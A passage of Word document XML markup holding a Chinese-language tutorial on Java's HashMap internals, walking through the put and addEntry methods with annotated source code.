                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hansh</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>桶后面的元素</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            Object k;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            if (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))) {  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>如果有相同的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>，那么需要替换</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>value</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                V oldValue = e.value;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                e.value = value;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                e.recordAccess(this);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>                return oldValue;  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>返回以前的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>value</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            }</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:before="136" w:after="136"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>        modCount++;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        addEntry(hash, key, value, i);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>放入</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        return null;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="240" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这个函数其实本身还是很简单的，首先通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数获取当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>值，不过这里需要注意的是，对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法返回的值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>本身还会进行一些处理，具体什么样子的就不细说了，然后再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exFor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法用于确定当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>应该属于当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>桶的位置，接着就是遍历当前桶后面的链表了，这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法就派上用场了，这里看到如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是相等的话，那么就直接用新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来替换原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就好了。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　当然最多的情况还是，桶后面的链表没有与当前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>相同的，那么这个时候就需要调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法，将要加入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>放入到当前的结构中了，那么接下来来看看这个方法的定义吧：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8317" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="999999"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8317"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidTr="00223A40">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:before="136" w:after="136"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>    void addEntry(int hash, K key, V value, int bucketIndex) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        if ((size &gt;= threshold) &amp;&amp; (null != table[bucketIndex])) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            resize(2 * table.length);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>相当于重新设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>桶</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            hash = (null != key) ? hash(key) : 0;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            bucketIndex = indexFor(hash, table.length);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:before="136" w:after="136"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>        createEntry(hash, key, value, bucketIndex);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>创建新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>entry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
